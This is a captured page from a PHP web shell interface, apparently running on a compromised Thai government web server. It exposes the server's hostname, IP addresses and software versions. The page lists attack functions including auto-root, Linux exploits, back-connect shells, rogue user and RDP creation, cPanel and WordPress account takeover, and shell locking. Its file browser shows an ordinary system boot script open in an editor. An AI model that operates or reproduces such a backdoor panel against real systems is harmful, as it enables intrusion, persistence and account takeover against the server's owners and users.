Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
dracut /
modules.d /
95uswsusp /
[ HOME SHELL ]
Name
Size
Permission
Action
check
34
B
-rwxr-xr-x
install
181
B
-rwxr-xr-x
parse-uswsusp.sh
378
B
-rwxr-xr-x
resume-uswsusp.sh
186
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : parse-uswsusp.sh
#!/bin/sh if resume=$(getarg resume=) && ! getarg noresume; then export resume else unset resume fi case "$resume" in LABEL=*) resume="$(echo $resume | sed 's,/,\\x2f,g')" resume="/dev/disk/by-label/${resume#LABEL=}" ;; UUID=*) resume="/dev/disk/by-uuid/${resume#UUID=}" ;; esac if splash=$(getarg splash=); then export splash else unset splash fi
Close